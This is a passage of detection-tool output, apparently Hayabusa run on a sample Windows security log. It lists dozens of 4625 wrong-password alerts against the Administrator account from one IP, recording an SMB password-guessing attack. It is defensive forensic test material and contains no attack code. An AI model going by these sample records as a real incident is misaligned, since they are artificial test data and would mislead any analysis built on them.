NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
